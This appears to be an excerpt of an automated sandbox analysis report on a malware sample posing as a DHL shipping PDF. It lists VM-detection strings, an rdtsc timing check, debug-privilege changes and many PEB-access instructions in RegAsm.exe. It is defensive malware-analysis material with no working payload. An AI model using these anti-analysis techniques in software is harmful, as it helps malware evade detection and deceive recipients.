Source: explorer.exe, 00000007.00000000.346864234.000000000EF2A000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R\S-1-5
Source: explorer.exe, 00000007.00000000.346864234.000000000EF2A000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}3E560C6
Source: explorer.exe, 00000007.00000000.344459593.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314231472.000000000113B000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_004088E0 rdtsc

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\chkdsk.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CED294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CED294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CCAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CCAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D7EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D44257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D6B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D6B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D88A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CD3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D353CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D353CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CDDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D6D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D7138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D85BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D88B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D7131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D4B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D4B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D4B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D4B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D4B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D4B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D33884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D33884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CD0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CD0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D72073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D81074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D37016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D37016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D37016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D84015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D84015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CCB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CCB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CCB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CCB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D441E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CDC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D351BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D351BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D351BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D351BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D369A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CDB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CDB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CD4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CD4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CD4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CD4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CD4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D88ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D6FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D4FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D346A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D80EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D80EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D80EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D7AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D7AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CDAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CDAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CDAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CDAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CDAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D6FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D37794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D37794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D37794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC8794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CCEF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CCFF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D88F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D4FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D4FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D8070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D8070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CDF716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D88CD6 mov eax, dword ptr fs:[00000030h]
